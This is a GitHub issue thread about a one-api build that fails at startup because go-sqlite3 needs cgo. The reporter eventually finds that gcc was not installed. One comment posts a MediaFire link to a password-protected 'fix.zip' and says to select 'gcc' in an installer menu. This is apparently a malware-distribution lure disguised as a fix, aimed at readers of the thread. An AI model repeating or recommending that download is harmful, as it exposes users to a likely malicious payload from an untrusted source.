### ISSUE TITLE
[error] failed to initialize database, got error Binary was compiled with 'CGO_ENABLED=0',

### ISSUE THREAD

**Issue by yongshengma** [songquanpeng/one-api#1767]
今天刚克隆最新版本，手动部署，一直顺利。到了运行这一步，报错如下：

$ ./one-api --port 3000 --log-dir ./logs
[SYS] 2024/08/26 - 17:30:58 | One API v0.0.0 started 
[SYS] 2024/08/26 - 17:30:58 | SQL_DSN not set, using SQLite as database 

2024/08/26 17:30:58 /home/yongsheng/one-api/model/main.go:106
[error] failed to initialize database, got error Binary was compiled with 'CGO_ENABLED=0', go-sqlite3 requires cgo to work. This is a stub
[FATAL] 2024/08/26 - 17:30:58 | [failed to initialize database: Binary was compiled with 'CGO_ENABLED=0', go-sqlite3 requires cgo to work. This is a stub]

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yongshengma** [comment]
不明白您的意思。我的环境是在 ubuntu 上

**Comment by yongshengma** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."


不明白您的意思。我的环境是在 ubuntu 上

**Comment by yongshengma** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

OK, it is caused by gcc.  I didn't install gcc.  The README should mention it as no message duing go build.
